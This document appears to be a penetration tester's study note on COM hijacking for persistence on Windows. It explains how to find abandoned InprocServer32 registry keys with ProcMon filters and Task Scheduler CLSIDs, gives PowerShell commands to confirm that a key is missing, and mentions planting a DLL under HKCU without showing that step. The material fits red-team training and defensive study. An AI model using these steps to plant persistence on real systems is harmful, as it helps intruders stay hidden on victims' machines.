Although it is possible to modify COM objects in use, it might break certain applications and lose stealth. A better way is to look for abandoned registry keys (which applications attempt to access but don’t actually exist in the registry hive).
Finding Abandoned Keys (ProcMon)
Process Monitor from Sysinternals Suite is useful for hunting potential COM hijacks. If not possible to use on target machine, use it on own machine first (similar Windows version probably necessary).
Set the filter to:
RegOpenKey
operations- and result is
NAME NOT FOUND
{.verbatim} - and path ends with
InprocServer32
{.verbatim}
Finding Abandoned Keys (Task Scheduler)
Another way to find abandoned keys is through task scheduler:
Say the CLSID is {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}
{.verbatim}. Make sure to check first whether the task is reboot-persistent (in Task Scheduler or in PowerShell). Often, we can see that the COM object is defined in HKCR: Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
. The same applies to HKLM. Where the hijacking comes is HKCU
Hijacking
Say from the above steps we find a suitable abandoned key HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32
{.verbatim} shows up in the event list, we can use Get-Item -Path "HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32"
to confirm that it doesn’t exist.
To hijack the nonexistent COM hijack (after first uploading the DLL) (pretend this is the target machine, not the attacker’s):
Clean up after yourself
Remember to delete both the registry entries in HKCU and the associated DLL file.